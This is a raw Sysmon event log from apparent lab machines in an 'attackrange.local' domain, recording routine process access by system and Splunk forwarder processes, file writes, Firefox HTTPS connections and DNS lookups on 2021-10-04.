07:58:34.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082850Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082849Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082848Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082847Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082846Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082845Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082844Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082843Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.495{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082842Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.495{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B42A-615A-7D01-00000000FD01}316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082841Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.495{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B42A-615A-7D01-00000000FD01}316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082840Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.496{2FDD8D40-B42A-615A-7D01-00000000FD01}316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082839Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.354{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EF1EF640A1003995ACB37BFF373EB40,SHA256=F91E96B32498261F9D10706BBB98B9C658C9E50F8DFC02116037F76D246B1C37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105694Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.766{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Roaming\Mozilla\Firefox\Profiles\P09S3I~1.DEF\cert9.db-journalMD5=86D6FF0342C6A2859F69450BB23311D6,SHA256=B93257A8AEDC413A747A23C7DC90EE7F8FEF83827E8DAD0EC947D35F31091665,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105693Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.613{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CDDC53EF58DCACA3D957627C0688F03E,SHA256=2055F79EEC7AD654676F0CAEE1C8FA4151913877E121AA3C5D20C2B2332D4F24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105692Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.582{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\formhistory.sqlite-journalMD5=99A3E4DB830166F2873A73204FA3AEE6,SHA256=5451217A4B7B3B73B1DCF6440D5FF59E84F53AC7E3AD805381E06DA323C81E83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105691Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.566{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\formhistory.sqlite-journalMD5=3A0B76396F2E114B34A39A4101EAD162,SHA256=EF71E306094D16E274874A192FF155EA7B80BD1E813765DA3B446598C7608BBC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105690Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.498{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0 354300x8000000000000000105689Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.434{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51781-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105688Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.423{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-56017-true2001:503:c27:0:0:0:2:30j.root-servers.net53domain 354300x8000000000000000105687Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.416{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51780-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 23542300x8000000000000000105686Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:34.282{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3C493B067DDC802E1E4130BE1469B7A,SHA256=2B20C8A05BF554FC9D378FFCBE9EC7E6CCD683DEBC290DFE5CF309722E4FB86A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105685Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.393{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59965- 354300x8000000000000000105684Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.393{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local65400- 354300x8000000000000000105683Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.392{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62103- 354300x8000000000000000105682Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.390{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63114- 354300x8000000000000000105681Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.390{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49594- 354300x8000000000000000105680Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.378{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61908- 354300x8000000000000000105679Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.377{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52166- 354300x8000000000000000105678Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.377{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63974- 354300x8000000000000000105677Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.377{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52364- 354300x8000000000000000105676Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.377{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62968- 23542300x800000000000000082838Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.089{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1B717B1DE2F422B42A67B5A9AC350A6,SHA256=1F4C0520A792984B61CE9CEDB1258D076FAC02F50C17D009463B2E94ED1E6241,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105675Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.375{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62917- 354300x8000000000000000105674Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.375{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63394- 354300x8000000000000000105673Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.375{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52845- 354300x8000000000000000105672Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.370{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-57302-true2001:500:200:0:0:0:0:b-53domain 354300x8000000000000000105671Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.351{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51779-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105670Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.332{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51778-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105669Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.314{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51777-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105668Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.258{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51776-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105667Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.240{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51775-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105666Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.196{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51774-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105665Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.189{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64170- 354300x8000000000000000105664Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.189{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-63913- 354300x8000000000000000105663Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.178{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51773-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105662Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.165{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51772-false13.32.29.25server-13-32-29-25.fra56.r.cloudfront.net443https 354300x8000000000000000105661Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.156{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT 